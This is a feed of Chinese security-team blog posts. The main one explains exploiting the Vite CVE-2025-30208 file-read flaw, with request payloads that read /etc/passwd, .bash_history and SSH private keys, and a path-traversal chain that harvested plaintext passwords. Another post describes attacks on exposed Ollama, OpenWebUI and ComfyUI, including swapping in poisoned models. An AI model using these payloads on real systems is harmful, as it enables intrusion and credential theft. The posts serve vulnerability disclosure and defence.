discard_fair_use_policy=discard_fair_use_policy)        self.storage = SqliteStorage(db_path, timeout=timeout)        self.platforms = platforms    def _verify_threat_list_checksum(self, threat_list, remote_checksum):        local_checksum = self.storage.hash_prefix_list_checksum(threat_list)return remote_checksum == local_checksum    def update_hash_prefix_cache(self):"""Update locally cached threat lists."""        try:            self.storage.cleanup_full_hashes()            self.storage.commit()            self._sync_threat_lists()            self.storage.commit()            self._sync_hash_prefix_cache()        except Exception:            self.storage.rollback()            raise    def _sync_threat_lists(self):        threat_lists_to_remove = dict()for ts in self.storage.get_threat_lists():            threat_lists_to_remove[repr(ts)] = ts        threat_lists = self.api_client.get_threats_lists()for entry in threat_lists:            threat_list = ThreatList.from_api_entry(entry)if self.platforms is None or threat_list.platform_type in self.platforms:                self.storage.add_threat_list(threat_list)                try:                    del threat_lists_to_remove[repr(threat_list)]                except KeyError:                    passfor ts in threat_lists_to_remove.values():            self.storage.delete_hash_prefix_list(ts)            self.storage.delete_threat_list(ts)        del threat_lists_to_remove    def _sync_hash_prefix_cache(self):        client_state = self.storage.get_client_state()for response in self.api_client.get_threats_update(client_state):            response_threat_list = ThreatList(response['threatType'], response['platformType'],                                              response['threatEntryType'])if response['responseType'] == 'FULL_UPDATE':                self.storage.delete_hash_prefix_list(response_threat_list)for r in response.get('removals', []):                self.storage.remove_hash_prefix_indices(response_threat_list, r['rawIndices']['indices'])for a in response.get('additions', []):                hash_prefix_list = HashPrefixList(a['rawHashes']['prefixSize'], b64decode(a['rawHashes']['rawHashes']))                self.storage.populate_hash_prefix_list(response_threat_list, hash_prefix_list)            expected_checksum = b64decode(response['checksum']['sha256'])            log.info('Verifying threat hash prefix list checksum')if self._verify_threat_list_checksum(response_threat_list, expected_checksum):                log.info('Local cache checksum matches the server: {}'.format(to_hex(expected_checksum)))                self.storage.update_threat_list_client_state(response_threat_list, response['newClientState'])                self.storage.commit()else:                raise Exception('Local cache checksum does not match the server: ''"{}". Consider removing {}'.format(to_hex(expected_checksum), self.storage.db_path))    def _sync_full_hashes(self, hash_prefixes):"""Download full hashes matching hash_prefixes.        Also update cache expiration timestamps.        """        client_state = self.storage.get_client_state()        fh_response = self.api_client.get_full_hashes(hash_prefixes, client_state)# update negative cache for each hash prefix# store full hash (insert or update) with positive cache bumped upfor m in fh_response.get('matches', []):            threat_list = ThreatList(m['threatType'], m['platformType'], m['threatEntryType'])            hash_value = b64decode(m['threat']['hash'])            cache_duration = int(m['cacheDuration'].rstrip('s'))            malware_threat_type = Nonefor metadata in m['threatEntryMetadata'].get('entries', []):                k = b64decode(metadata['key'])                v = b64decode(metadata['value'])if k == 'malware_threat_type':                    malware_threat_type = v            self.storage.store_full_hash(threat_list, hash_value, cache_duration, malware_threat_type)        negative_cache_duration = int(fh_response['negativeCacheDuration'].rstrip('s'))for prefix_value in hash_prefixes:            self.storage.update_hash_prefix_expiration(prefix_value, negative_cache_duration)    def lookup_url(self, url):"""Look up specified URL in Safe Browsing threat lists."""iftype(url) is not str:            url = url.encode('utf8')if not url.strip():            raise ValueError("Empty input string.")        url_hashes = URL(url).hashes        try:            list_names = self._lookup_hashes(url_hashes)            self.storage.commit()        except Exception:            self.storage.rollback()            raiseif list_names:return list_namesreturn None    def _lookup_hashes(self, full_hashes):"""Lookup URL hash in blacklists        Returns names of lists it was found in.        """        full_hashes = list(full_hashes)        cues = [fh[0:4] for fh in full_hashes]        result = []        matching_prefixes = {}        matching_full_hashes = set()        is_potential_threat = False# First lookup hash prefixes which match full URL hashfor (hash_prefix, negative_cache_expired) in self.storage.lookup_hash_prefix(cues):for full_hash in full_hashes:if full_hash.startswith(hash_prefix):                    is_potential_threat = True# consider hash prefix negative cache as expired if it is expired in at least one threat list                    matching_prefixes[hash_prefix] = matching_prefixes.get(hash_prefix, False) or negative_cache_expired                    matching_full_hashes.add(full_hash)# if none matches, URL hash is clearif not is_potential_threat:return []# if there is non-expired full hash, URL is blacklisted        matching_expired_threat_lists = set()for threat_list, has_expired in self.storage.lookup_full_hashes(matching_full_hashes):if has_expired:                matching_expired_threat_lists.add(threat_list)else:                result.append(threat_list)if result:return result# If there are no matching expired full hash entries# and negative cache is still current for all prefixes, consider it safeif len(matching_expired_threat_lists) == 0 and sum(map(int, matching_prefixes.values())) == 0:            log.info('Negative cache hit.')return []# Now we can assume that there are expired matching full hash entries and/or# cache prefix entries with expired negative cache. Both require full hash sync.        self._sync_full_hashes(matching_prefixes.keys())# Now repeat full hash lookupfor threat_list, has_expired in self.storage.lookup_full_hashes(matching_full_hashes):if not has_expired:                result.append(threat_list)return result

该脚本内容与 \work\work\home\user\PycharmProjects\gsb 内容一致。

路径

\work\work\media\user\MacKMLink

MacKMLink.exe 是一个与罗技 (Logitech) 鼠标和键盘软件相关的可执行文件。它通常是Logitech Options或Logi Options+ 这类罗技官方配置软件的一部分。

由于MacKMLink.exe是一个常见且通常被信任的后台进程，恶意软件作者有时会利用这一点进行伪装。

路径

\work\work\mnt\hgfs\Desktop\fish_25327

有一些钓鱼会用到的东西

路径

\work\work\mnt\hgfs\Desktop\111

这个目录很乱，有一些账户数据库文件、编译命令的文档以及一些C2配置文件等等。。

路径

\work\work\mnt\hgfs\Desktop\New folder

钓鱼VPS

路径

\work\work\mnt\hgfs\share_data

除了共享的TW数据，与其它路径文件并无二致

路径

\work\work\home\user.config

用户配置文件

路径

\work\work\home\user.config\sogou-qimpanel\skin

黑阔同款搜狗皮肤用上

路径

\work\work\home\user
\work\work\root

都有 .bash_history 文件，我们在进攻性测试时，可以伪造同样的历史记录。

总结

虽然泄露的文件仅是一名成员的电脑，但是我们可以看到Kimsuky组织显然拥有一个成熟的、内部开发的恶意软件“武器库”。

他们不依赖于公开的、现成的黑客工具，而是倾向于自己编写或深度魔改其攻击载荷的每一个组件。

这体现了其高水平的技术能力和极强的反侦察意识。

总而言之，泄露的一些代码片段已经描绘了一个典型的、高水平国家级黑客组织的轮廓。他们不仅拥有强大的攻击能力，更在“如何隐藏自己”这门艺术上登峰造极。

对于安全防御人员来说，研究这些代码是理解现代高级威胁行为、改进检测策略和开发防御工具的宝贵资料。

ps：因为时间的关系，我并没有查看所有文件，所以部分内容仍在探索。

我是Snow 狼，我在渊龙Sec安全团队等你微信公众号：渊龙Sec安全团队欢迎关注我，一起学习，一起进步~本篇文章为团队成员原创文章，请不要擅自盗取！

阅读原文

跳转微信打开

2024年团队奖金来啦~EduSRC年度第一！

Sun, 29 Jun 2025 21:29:00 +0800

原创渊龙Sec安全团队 2025-06-29 21:29 广东

闲云潭影日悠悠，物换星移几度秋。感谢各位团队师傅的关注和支持，经过2024年大家的辛勤付出，我们团队取得了EduSRC平台的年度安全团队第一名！！！

闲云潭影日悠悠，物换星移几度秋。感谢各位团队师傅的关注和支持，经过2024年大家的辛勤付出，我们团队取得了EduSRC平台的年度安全团队第一名！！！

收到了来自EduSRC平台的8K现金奖金，将在表彰后，按照2024贡献的Rank值，统一将8K的现金奖金发放给EDU小组的成员们~~

年度优秀团队证书

渊龙Sec安全团队荣获教育漏洞报告平台

“2024年度团队第一名”

▲ “2024年度优秀团队”

优秀组长组员表彰

恭喜师傅们荣获“优秀组长”“优秀组员”奖金

感谢团队师傅在2024年的关注和支持~~

新的一年，大家一起向前冲！！！

优秀组长表彰

EDU小组的精神领袖是谁呢？

梅苑_

AabyssZG

期待您到来

优秀组员表彰

看看今年奖金花落谁家呢？

我落泪_情绪零碎

piao

Lalala

iChet

叫我十一大人

sonumb

Rebori

IntAx

loopk

He_11

driftin9

余七

FoRever

Sun

塔菲_taffy1

Silent

fatlong

花菌

左卫門

AdGeLi

期待您到来

2024 EduSRC优秀成员表彰

如何加入我们？

渊龙Sec安全团队的EDU小组，将在新的一年持续开放，满足以下条件即可加入：

EduSRC平台Rank值大于200
人品端正，不接触灰黑产

先在EduSRC平台上申请加入团队，再申请加入专属QQ群：668249257，我们欢迎各位师傅的到来~

在我们的EDU小组，你能获得什么？

和大佬们深入交流技术
发现工作机会、参加团队内部项目
团队内总榜前50名师傅，免费获得团队内部武器资料库的使用权限
能够获得优质的技术学习资料
优先加入到渊龙Sec核心团队
......

阅读原文

跳转微信打开

从CVE-2025-30208看任意文件读取利用

Thu, 03 Apr 2025 21:11:00 +0800

原创渊龙Sec安全团队 2025-04-03 21:11 广东

我们很多时候都轻视了任意文件读取漏洞，让我们一起从CVE-2025-30208深入看任意文件读取漏洞利用场景，从任意文件读取漏洞到GetShell！

微信公众号：渊龙Sec安全团队
为国之安全而奋斗，为信息安全而发声！
如有问题或建议，请在公众号后台留言
如果你觉得本文对你有帮助，欢迎在文章底部赞赏我们

0# 概述

师傅们好久不见！最近不是特别忙，就研究研究最新的漏洞

刚好最近一大批漏洞都爆出来了，比如 CVE-2025-1097, CVE-2025-1098, CVE-2025-24514, CVE-2025-1974 Kubernetes Ingress-Nginx Admission Controller RCE Escalation，是危害性极大的高危漏洞，在内网渗透中能直接击穿K8S集群。

这些高危漏洞其实分析文章很多，看国内外众多大佬的分析都非常精彩，这里我也不献丑了

但引起我关注的漏洞是 CVE-2025-30208 Vite Development Server Arbitrary File Read 这个任意文件读取漏洞。

其实我们很多时候都轻视了任意文件读取漏洞，特别是很多刚入行学习网安的师傅，往往瞧不上任意文件读取漏洞，其实这是一种偏见。

今天就从 CVE-2025-30208 发散去讲任意文件读取漏洞，这种漏洞是有操作空间的，况且 CVE-2025-30208 利用简单、覆盖面广，那就有必要拎出来和大家交流一下，今天我就来抛砖引玉一下

1# 漏洞原理？

CVE-2025-30208 漏洞原理非常简单，就简单提一下：

Vite 开发服务器提供 @fs 机制，用于防止访问 Vite 允许列表之外的文件。然而，由于 URL 解析时的正则表达式处理不当，攻击者可以通过 ?raw?? 或 ?import&raw?? 等查询参数绕过访问限制，从而读取任意文件。

在 Vite 服务器的 URL 处理逻辑中，@fs 机制原本用于限制对非白名单目录的访问，例如：

1server: {
2  fs: {
3    allow: [path.resolve(__dirname, 'src')]
4  }
5}

Vite 在 URL 解析过程中会移除部分特殊字符，而未正确考虑查询参数的影响，导致攻击者可以构造类似如下的请求绕过安全检查：

1GET /etc/passwd?raw??
2GET /etc/passwd?import&raw??
3GET /@fs/etc/passwd?raw??
4GET /@fs/etc/passwd?import&raw??

由于 Vite 解析 URL 时未正确处理这些参数，导致绕过 server.fs.allow 限制，并返回任意文件内容。

按理说，此漏洞仅影响明确将 Vite 开发服务器暴露到网络的应用程序，即使用 --host 或 server.host 配置选项的情况。

但经过公网的资产测绘来看，涉及的数量非常可观，且实际测试的结果发现成功率较高，怪不得各家厂商都打上了高危的标签

该漏洞Exploit工具已经公开，Github地址：https://github.com/ThumpBo/CVE-2025-30208-EXP

2# 什么是bash_history？

众所周知，Linux用户的根目录是有区别的，root用户的根目录在 /root，而其他用户的根目录一般在 /home/用户名，比如我有一个名叫 demo 的用户，那这个用户的根目录在 /home/demo 下。

在Linux系统下每个用户的根目录下，都有四个bash隐藏文件，需要使用 ll -a 参数才会显示出来:

1-rw-------   1 demo demo      1710 Jan 22 16:20 .bash_history
2-rw-r--r--   1 demo demo        28 Oct 3 09:07 .bash_logout
3-rw-r--r--   1 demo demo       237 Jan  12 12:53 .bash_profile
4-rw-r--r--   1 demo demo       331 Oct 11 08:07 .bashrc

其中今天要说的主角是 .bash_history，它是Linux 命令的历史记录，会持久化存储，默认位置是当前用户根目录的 .bash_history 文件。

当 Linux 系统启动一个 Shell 时，Shell 会从 .bash_history 文件中，读取历史记录，存储在相应内存的缓冲区中。

我们平时所操作的 Linux 命令，都会记录在缓冲区中。包括 history 命令所执行的历史命令管理，都是在操作缓冲区，而不是直接操作 .bash_history 文件。

当我们退出 Shell，比如按下 Ctrl+D 时，Shell 进程会把历史记录缓冲区的内容，写回到 .bash_history 文件中去

3# 漏洞利用纵深

好了，上面把基础部分说完了。既然理论存在，那就实践开始！

注明：以下内容均为外网重点目标的实际利用（说句实话，这次在该漏洞的应急上，某大国居然比我国表现差），请在遵守当地法律的情况下合理学习利用

首先通过该漏洞读取 /etc/passwd 文件，发现该Linux上存在的用户信息，通过搜索 /home/ 关键词找到Linux上的实际用户，然后尝试读取 /root/.bash_history 文件，如下：

会发现显示 permission denied, open '/root/.bash_history' 这是因为不是所有业务都是用 root 账户起的（有些目标还是可以的），所以并没有权限读取 /root/.bash_history 文件，那接下来就要尝试其他用户，如下：

哦哟，你看我发现了什么？SSH服务的公钥 authorised_keys 和 .ssh/ 文件夹路径！

其实刚看 .bash_history 很糊，内容都缩成一团了，但可以通过编辑器工具对内容进行格式化：

剩下的大家都猜的出来了，通过 CVE-2025-30208 读取 /home/d*****in/.ssh/id_rsa 成功拿到了私钥，成功拿下该服务器，其实也可以直接猜测路径：

1/root/.ssh/id_rsa?import&raw??
2/root/.ssh/id_ed25519?import&raw??
3/@fs/root/.ssh/id_rsa?raw??
4/@fs/root/.ssh/id_ed25519?import&raw??

通过尝试拼接这个URL，可以批量去尝试读取对方机器的SSH私钥，但不一定在 /root 下，如果是在其他用户的目录下，就需要像上面一样尝试从 /etc/passwd 拿到用户名，并读取 /home/用户名/.ssh/id_rsa 拿到私钥。

同时不止是找到SSH私钥，还可以在 .bash_history 找到数据库账号密码，认证需要的Key，以及SSH密码等等，如下：

没想到吧？

4# 任意文件读取还能这么玩？

好了，通过上面你应该认识到任意文件读取漏洞的危害了~

既然都说到任意文件读取漏洞了，接下来我要分享之前在某高校平台提交的任意文件读取组合技实现GetShell的实战报告（PS：该漏洞目前已经上报修复啦，且我不是在SRC平台提交的，有相关授权，说泄露报告的师傅就不必了，本次披露仅做警示作用！）

通过信息搜集和模糊测试，对核心平台头像地址进行探测，发现敏感地址 /stu/common/getPic?path=/2023/图片名，模糊测试发现任意文件读取漏洞（且该接口无鉴权），链接如下：

1https://xxxxxxxx.cn/system/common/getPic?path=/../../../../../../../../../../../../../../../../../etc/passwd

尝试对 root 账户和 *****admin 账户的历史执行命令进行读取:

在 /root/.bash_history 文件中，发现Tomcat的绝对路径，同样在 /home/*****admin/.bash_history 也找到类似的目录

于是对tomcat的敏感路径进行读取，发现Tomcat日志路径，链接如下：

1https://xxxxxxxx.cn/system/common/getPic?path=/../../../../../../../../../../../../usr/local/apache-tomcat-8.5.50/logs/localhost_access_log.2023-10-25.txt

在Tomcat的日志文件中，可以清晰的看到平台登录的传参！！！在核心平台登录过程中，居然使用Get进行登录明文传输，而不是Post进行加密传输！

通过编写Python脚本利用该任意文件读取漏洞，可以批量下载日志文件：

再通过编写Python脚本对下载的TXT进行正则匹配和输出，最终得到18万行的核心平台用户的账户和明文密码，后续通过登录平台找到其他漏洞成功GetShell！

5# 总结

今天我就是来抛砖引玉，详细的讲解了任意文件读取漏洞的攻击利用链，任意文件读取漏洞一直是我们日常所忽视的漏洞，大部分情况下它可能是鸡肋的，但有时候就能作为神助攻，成功祝你GetShell！

如果师傅们还有一些骚姿势，可以在评论区秀出来，也可以和我友好交流哈哈~

我是曾哥，我在渊龙Sec安全团队等你
微信公众号：渊龙Sec安全团队
欢迎关注我，一起学习，一起进步~
本篇文章为团队成员原创文章，请不要擅自盗取！

阅读原文

跳转微信打开

白帽黑客访谈：第二期嘉宾揭幕

Tue, 25 Feb 2025 11:17:00 +0800

地图大师挖漏洞 2025-02-25 11:17 广东

白帽大佬访谈，感兴趣的师傅们周四晚上20:00不见不散~

嘉宾介绍

📌 你是否曾经思考过，安全工具是如何从无到有？
📌 你是否好奇，一名安全团队创始人如何带领团队攻克难题，在网络安全领域开辟属于自己的天地？

在第二期白帽黑客访谈中，我们请到了重量级嘉宾——曾哥！

他不仅是知名安全团队的创始人，还开发了多个广为流传的安全工具，影响了无数安全研究员的工作方式。💡 从工具开发到团队管理，从技术创新到行业洞察，曾哥的经验和思考，值得每一位安全人细细品味。

🚀 他如何从0开始，打造出被行业认可的安全工具？
🚀 他如何带领团队，在复杂的网络安全环境中立足？
🚀 他对未来安全行业的发展有何独到见解？

这些问题，都将在这期节目中揭晓！🎙️

直播时间

⏳ 直播时间：暂定本周四 20:00
📍 B站：地图大师returnwrong直播间
📍 微信视频号：Freebuf视频号、知识大陆视频号

🔥 如果你对安全工具开发、团队管理、行业趋势感兴趣，千万不要错过！
📣 欢迎留言你最想问曾哥的问题，我们将在访谈中挑选精彩问题进行解答！

📢 让我们一起，把那些值得被听见的声音，带回到这个世界上！

公开群

此为公开群，只为收集大家对想听大佬的投票及大家反馈的建议！

这个群完全免费，但希望真正有想法、有技术追求的安全人加入！

🎯 白帽黑客访谈交流群正式开放！ 🎯

在上次直播后，很多小伙伴都留言希望有一个专属交流群，可以一起探讨行业大佬的成长经历，分享技术经验，交流挖洞思路，甚至为未来的访谈提供建议！💡

📌 为什么要建这个群？

✅ 想听谁，你来决定！——下期嘉宾由你来提名，投票决定你最想听的大佬！
✅ 访谈提问直通车！——提前收集大家最关心的问题，让嘉宾在访谈中解答你的疑问！
✅ 技术交流 & 思维碰撞！——群内聚集安全爱好者、漏洞猎人、工具开发者、红蓝对抗专家，共同学习，共同进步！
✅ 访谈内容不掉队！——错过直播？群内定期整理核心内容，不让你错过任何干货！

阅读原文

跳转微信打开

DeepSeek本地化部署有风险！快来看看你中招了吗？

Tue, 18 Feb 2025 10:46:00 +0800

腾讯朱雀实验室 2025-02-18 10:46 广东

DeepSeek的私有化部署真的安全吗？让我们随腾讯安全应急响应中心一起来看看~

2025年伊始，AI领域迎来一个重要变革 - DeepSeek R1开源发布，凭借着低成本、性能出众的优势，这个模型在短短几周内就获得空前关注。由于官网服务经常繁忙，大家开始选择使用Ollama+OpenWebUI、LM Studio等工具进行本地快速部署，从而将AI能力引入企业内网和个人PC环境。

近期腾讯朱雀实验室发现：这些广受欢迎的AI工具中普遍存在安全漏洞。如果使用不当，攻击者可能窃取用户数据、滥用算力资源，甚至控制用户设备。

文本将介绍这些流行AI工具的安全问题，以及如何使用开源的AI-Infra-Guard一键检测与收敛相关风险。

一、Ollama

Ollama是一个开源应用程序，允许用户在Windows、Linux和macOS设备上本地部署和操作大型语言模型（LLM），受 Docker 的启发，Ollama 简化了打包和部署 AI 模型的过程，现在已成为最流行的的个人电脑跑大模型的方案，目前网络上大部分本地部署DeepSeek R1的文章也是推荐的此工具。

Ollama默认启动时会开放11434端口，在此端口上公开使用restful api执行核心功能，例如下载模型，上传模型，模型对话等等。默认情况下ollama只会在本地开放端口，但是在Ollama的docker中，默认会以root权限启动，并且开放到公网上。

ollama对这些接口普遍没有鉴权，导致攻击者扫描到这些ollama的开放服务后可以进行一系列攻击手段。

1）模型删除

例如，通过接口删除模型。

2）模型窃取

通过接口查看ollama模型。

ollama支持自定义镜像源，自建一个镜像服务器，再通过接口就能轻松窃取私有模型文件。

3）算力窃取

通过接口查看ollama模型。之后便能用请求对话，窃取了目标机器的算力。

4）模型投毒

可以通过接口查看正在运行的模型，接着可以用下载有毒的模型，通过删除正常模型，在通过接口迁移有毒模型到正常模型路径，通过有毒模型污染使用者的对话。

5）远程命令执行漏洞 CVE-2024-37032

ollama在去年6月爆发过严重的远程命令执行漏洞【CVE-2024-37032】是Ollama开源框架中一个严重的路径遍历漏洞，允许远程代码执行（RCE），CVSSv3评分为9.1。该漏洞影响Ollama 0.1.34之前的版本，通过自建镜像伪造manifest文件，实现任意文件读写和远程代码执行。

缓解方案

升级到最新版ollama，但是ollama官方目前无任何鉴权方案，运行ollama serve时确认环境变量OLLAMA_HOST为本地地址，避免公网运行。建议本地运行ollama再使用反向代理工具（如Nginx）为服务端增加访问保护

据统计,目前公网上仍有约4万个未设防的Ollama服务,请检查您的部署是否安全。

二、OpenWebUI

openwebui是现在最流行的大模型对话webui，包含大模型聊天，上传图片，RAG等多种功能且方便与ollama集成。也是现在deepseek本地化部署常见的搭配。openwebui在历史上也出现了不少漏洞，这里挑选几个典型。

【CVE-2024-6707】一个文件黑掉你的AI

用户通过Open WebUI的HTTP界面点击消息输入框左侧的加号（+）上传文件时，文件会被存储到静态上传目录。上传文件名可伪造，未进行校验，允许攻击者通过构造包含路径遍历字符（如../../）的文件名，将文件上传至任意目录。

攻击者可通过上传恶意模型（如包含Python序列化对象的文件），反序列化后执行任意代码，或通过上传authorized_keys实现远程命令执行。

流程图如下：

缓解方案

升级到最新版，避免开启用户系统。

三、ComfyUI‍

ComfyUI是现在最流行的diffusion模型应用，因其丰富的插件生态和高度定制化节点闻名，常用于文生图、文生视频等领域。

ComfyUI和Ollama一样，开发者最初可能只想在本地使用，没有任何鉴权方式，但是也有大量开放到公网的ComfyUI应用。

ComfyUI因为插件生态闻名，但是插件的作者一般为个人开发者，对安全性没有太多关注，腾讯朱雀实验室在去年就发现多个ComfyUI及其插件漏洞。

朱雀实验室历史发现漏洞：

以上大部分漏洞影响ComfyUI全系列核心代码(包含目前最新版本)，部分流行插件，影响包括远程命令执行、任意文件读取/写入，数据窃取等。

缓解方案

由于漏洞修复缓慢，ComfyUI最新版本目前仍然存在漏洞，不建议将其暴露公网使用。

四、AI-Infra-Guard: AI风险一键检测与防范

在过去一年中，朱雀蓝军围绕混元大模型安全开展了深入研究和实践，逐步落地了一套大模型软件供应链安全解决方案。该项目拥有轻量、快速、无害发现AI安全威胁的能力，利用大模型进行漏洞采集，已经帮助收敛了多处“开源软件供应链漏洞导致混元数据泄露”的风险盲点，验证了利用大模型赋能安全的应用潜力。

一个日常场景：

安全团队："求求你们先把ollama的鉴权打开"

算法团队："可是文档没说需要安全配置啊..."

运维团队："这框架我都没听说过，怎么扫描？"

也正是这些痛点，催生了AI-Infra-Guard的诞生。

AI-Infra-Guard是什么

AI Infra Guard(AI Infrastructure Guard) 是一个高效、轻量、易用的AI基础设施安全评估工具，专为发现和检测AI系统潜在安全风险而设计。目前已经支持检测30种AI组件、不仅支持常见的AI应用dify、comfyui、openwebui，也支持像ragflow、langchain、llama-factory等开发训练框架的漏洞检测。

1）通过大模型自动积累漏洞规则

为了解决海量AI组件CVE漏洞规则的人工分析成本，我们实现了用大模型自动将历史漏洞收集的方案，传统方式中可能需要人工分析CVE描述 → 写正则匹配规则（耗时3h/漏洞），现在利用混元大模型，自动同步CVE+大模型自动解析 -> 生成漏洞检测逻辑只需要30s。也实现了对AI组件相关漏洞的实时监控：

2）使用友好

· 零依赖，开箱即用，二进制文件仅8MB

· 内存占用＜50MB，扫完千节点集群不卡顿

· 跨平台兼容，同时支持Windows/MacOS/Linux

使用

Al-Infra-Guard 已在GitHub开源，目前已收录30+AI应用指纹，200+安全漏洞数据库，且已包含腾讯朱雀实验室独家发现的英伟达Triton，Pytorch，ComfyUI与Ray等知名AI组件漏洞。

对于个人用户，想检测自己本地AI组件应用，可以执行如下命令一键检测

./ai-infra-guard -localscan

将对本地开放端口进行检查和识别，给出安全建议。

如上文中使用了包含漏洞的ollama版本，一键检测后提示如下：

如果在检测到AI服务在公网开放，也会提示

对于开发者/运维，想检测部署AI服务的安全性，执行命令

单个目标./ai-infra-guard -target [IP:PORT/域名] 
多个目标./ai-infra-guard -target [IP:PORT/域名] -target [IP:PORT/域名]
# 扫描网段寻找AI服务  ./ai-infra-guard -target 192.168.1.0/24
# 从文件读取目标扫描./ai-infra-guard -file target.txt

获取地址

开源地址：https://github.com/Tencent/AI-Infra-Guard/

下载地址（根据系统下载自己系统的版本）：https://github.com/Tencent/AI-Infra-Guard/releases

欢迎大家Star、体验并反馈工具的任何问题！

阅读原文

跳转微信打开

红包来袭~渊龙Sec安全团队给您拜年啦！

Tue, 28 Jan 2025 17:37:00 +0800

原创渊龙Sec安全团队 2025-01-28 17:37 浙江

发红包啦，冲冲冲！不知不觉中又过了一年，快来看看这一年团队收获了什么~

在这新春佳节，

渊龙Sec安全团队给大家拜年啦！

祝各位师傅在新的一年里志得圆满、平平安安！

春

爆竹声中一岁除

HAPPY NEW YEAR

节

今年很荣幸被邀请至腾讯安全沙龙（武汉站），发表了议题《APT视角下的攻防实践》，并在沙龙上面介绍了渊龙Sec安全团队。

PS：由于最近工作内容较为繁忙，所以渊龙Sec安全团队公众号一直没来及更新。立个Flag：在新的一年定要实现在团队公众号多更新文章哈哈~

回首2024，在广东和补天漏洞平台的负责人田朋师傅线下见了一面，并聊了许多关于当下网络安全领域的相关问题。

还在武汉，于腾讯安全沙龙见到了李鑫师傅，在沙龙上，我了解到了关于企业安全架构和业务侧的许多核心问题。

网络安全未来在何方？

经过2024这充实的一年，我们也有许多感悟~

根据笔者的观察，以及和各位大佬的探讨，我们给出的结论是这样：

目前行业的情况并不好。但可以看到，目前对于人才的需求还是存在的，基础人才有需求，但更需要高水平人才。

作为白帽子，不能浮躁，要沉得住气，坚守初心去努力磨砺自己的技术，也可以尝试安全其他赛道上面的内容，去迎接更好的明天。

未来谁也不知道。但从整体的角度来说，从规律的角度来看，行业也会越来越规范，不可能一直差下去，我们要等一个契机...

另外我需要提一个关键的观点：网络安全这个行业，本质上是技术指向性产业，最终的关键核心还是要回归技术。要深耕于技术领域，才能做出真正解决实际问题、痛点的产品，才能获得市场的认可。

在做技术团队的路上，渊龙Sec安全团队也得到了不少师傅的认同，其实笔者去年在博客上分享过我组建团队的宝贵经验，可以点击链接进来看看：感谢，渊龙三周年与龙年展望！

春

团队年终总结

HAPPY NEW YEAR

节

Github监控系统

今年团队新上线了Github监控系统：在一线攻防中，先得漏洞信息得天下，就有更多的可能性和主动权，常见的CVE监控和Github监控就是为此产生。

但很多监控项目都是钉钉或者邮件通知，实际上无法实时全面跟进通报的信息，内容多且无法团队协作审核，无法发挥出威力。团队内部基于此痛点，魔改出一个在线Github信息监控系统。

杀软查询系统

今年团队新上线了杀软在线识别，在线地址：https://av.aabyss.cn

项目的开源地址：https://github.com/Aabyss-Team/Antivirus-Scan

杀软识别一直是内网渗透中常见的课题，网络上也有非常多的在线杀软识别的网站；但很多在线识别的网站，都已经年久失修，许多新杀软无法有效准确识别；本项目由PHP进行编写，并采用Json匹配的方式，放弃数据库查询从而杜绝SQL注入，并进行开源维护，更加轻量化和安全！欢迎各位师傅给我们提交PR哦~

平台榜单成绩

不出意外，渊龙Sec安全团队依旧在EduSRC平台上稳居团队排行榜总排名No.1/年榜No.1。

同时本年度宣布一项团队内部福利政策：欢迎大家加入我们的EduSRC团队，EduSRC团队前50名可以免费获得团队内部武器资料库的使用权限！

并在年后，我们也会对EduSRC表现突出的团队成员进行表彰公示和奖励分发，让我们敬请期待！

在新的一年，我们也会尝试去参加别的SRC平台，感谢各位师傅一路上的陪伴和支持！

春

新春红包来啦

HAPPY NEW YEAR

节

由于今年团队Logo在申请商标，做不了红包封面

但我们团队给大家带来了现金新春红包！

限量500个新春红包，先到先得~

END

祥蛇献瑞巳巳如意

阅读原文

跳转微信打开

相约江夏·智汇攻防，武汉站走起~

Sat, 14 Dec 2024 13:27:00 +0800

2024-12-14 13:27 广东

欢迎大家前来腾讯安全沙龙（武汉站），本次笔者也会带来议题《APT视角下的攻防实践》，感谢腾讯安全云鼎实验室的筹备，和各位师傅多多交流和学习哈哈~

想要参加的师傅可以扫第二张邀请函的二维码，咋们武汉见！

相约江夏·智汇攻防，武汉站走起~

跳转微信打开

【成功案例】Lockbit家族百万赎金不必付！技术手段修复被加密的数据库，附溯源分析报告

Fri, 29 Nov 2024 10:30:00 +0800

索勒安全团队 2024-11-29 10:30 广东

对于勒索病毒的解密工作，一直是业内的难题！

今天渊龙Sec安全团队给各位师傅揭露面对勒索病毒解密细节的同时，也介绍了一下兄弟团队~

1.背景

1.1 事件背景

11月2日，某科技公司紧急联系我司团队求助，称其公司共有20余台服务器被勒索病毒加密。通过勒索信中提供的TOX（即时通讯软件），该公司尝试与黑客取得联系并展开谈判，在首次谈判中，当用户询问赎金费用时，黑客开出了20万美元（约合150万元人民币）的要价。

该赎金费用远远超出用户的预算，因此用户再次询问单个ID的恢复费用是否与恢复所有ID的费用一致。黑客的回复是，恢复所有ID的费用为20万美元（约合150万元人民币），而恢复单个ID的费用为15万美元（约合100万元人民币）。

然而，尽管用户尝试与黑客沟通并表达了经济困难，但黑客并未作出任何回应，且明确表示15万美元的赎金费用为最终报价，拒绝接受任何降价方案。由于该赎金金额远远超出了公司的承受范围，且无法确保支付赎金后数据能够成功恢复，公司决定不再与黑客继续交涉，而是转向寻求我司的专业技术支持，希望通过技术手段恢复数据，确保业务能够尽快恢复正常。

1.2 处理结果

在前期排查过程中，我们成功提取到了该加密器样本，并对其进行了深入分析。根据客户的反馈，其受感染数据对于业务运营至关重要，而服务器环境和业务系统则可以重新配置后再导入数据。基于这一实际情况，我们将工作重点明确为优先恢复数据，确保客户关键业务尽快恢复正常，同时为后续环境重建和系统优化做好技术支持准备。

在提取被加密的MSSQL数据库文件后，我们发现受影响的MSSQL数据库文件仅有头部被加密，这为数据恢复提供了可能性。在与客户协商后，我们决定提取所有被加密的数据库文件，集中进行恢复操作。同时，客户配合重置业务环境并重新搭建系统框架，以确保恢复后的数据能无缝导入新环境。整个流程旨在最大限度地缩短业务中断时间，恢复完成后将直接导入数据，确保业务快速回归正常运行。我们的计划不仅提高了数据恢复效率，还为客户节约了宝贵的运营时间。

最终，我们成功交付了恢复后的数据库文件，客户在验证后确认，恢复的数据库文件完整无误，可正常导入且未发现数据缺漏，各项功能均可正常使用。后续，文章将简要讲解本次数据库恢复的技术细节、入侵全流程的溯源分析，以及所采取的加固措施，旨在为其他遇到类似情况的公司提供有价值的参考与借鉴。

1.3 lockbit家族介绍

